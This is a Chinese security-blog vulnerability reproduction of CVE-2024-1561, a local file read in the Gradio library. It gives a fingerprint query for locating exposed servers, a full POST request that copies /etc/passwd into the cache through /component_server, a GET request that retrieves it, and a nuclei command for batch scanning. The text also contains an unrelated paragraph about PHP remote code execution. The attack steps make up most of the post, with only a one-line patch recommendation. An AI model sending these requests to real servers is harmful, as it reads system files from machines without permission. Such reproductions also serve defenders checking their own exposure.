漏洞复现-CVE-2024-1561

admin 2024年5月17日18:40:32评论53 views字数 1362阅读4分32秒阅读模式
免责声明

文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责。如有侵权烦请告知,我会立即删除并致歉。谢谢!

:漏洞名称

Gradio应用程序-本地文件读取漏

:漏洞描述

Gradio是一个用于构建快速原型和部署机器学习模型的Python库,提供了简单而强大的界面。它可以将模型转化为交互式应用程序,并支持各种类型的输入和输出界面,自定义样式和布局,以及异常情况处理。

    该漏洞存在于Gradio应用程序中的/component_server端点中。此端点缺乏适当的授权检查,使得攻击者可以使用任意参数调用Component类上的任何方法。恶意参与者可以通过将目标指向基础Block类的move_resource_to_block_cache方法来利用此漏洞。

漏洞影响版本

gradio

:网络空间测绘查询

body="__gradio_mode__"

漏洞复现-CVE-2024-1561

:漏洞复现

POC:
请求/config文件获取componets的id

漏洞复现-CVE-2024-1561

POST /component_server HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3Connection: closeContent-Length: 115Content-Type: application/jsonAccept-Encoding: gzip{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
PHP 中,传入代码执行或命令执行等危险函数的参数,客户端可控,同时针对该参数没有做过滤或过滤不足,导致代码执行或命令执行。通过远程访问方式传参,就叫做RCE。

漏洞复现-CVE-2024-1561

GET /file=/tmp/gradio/5160dcbcc73a9d0876e3ada9ca4c95f2d7c63bb5/passwd HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3Connection: closeContent-Length: 115Content-Type: application/jsonAccept-Encoding: gzip

漏洞复现-CVE-2024-1561

:批量检测
nuclei.exe -t POCCVE-2024-1561.yaml -l POChost.txt
:修复建议
建议更新当前系统或软件至最新版,完成漏洞的修复。
发送【0510】获取批量验证脚本
发送【工具】获取渗透测试工具

原文始发于微信公众号(Adler学安全):漏洞复现-CVE-2024-1561

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月17日18:40:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现-CVE-2024-1561https://cn-sec.com/archives/2751802.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息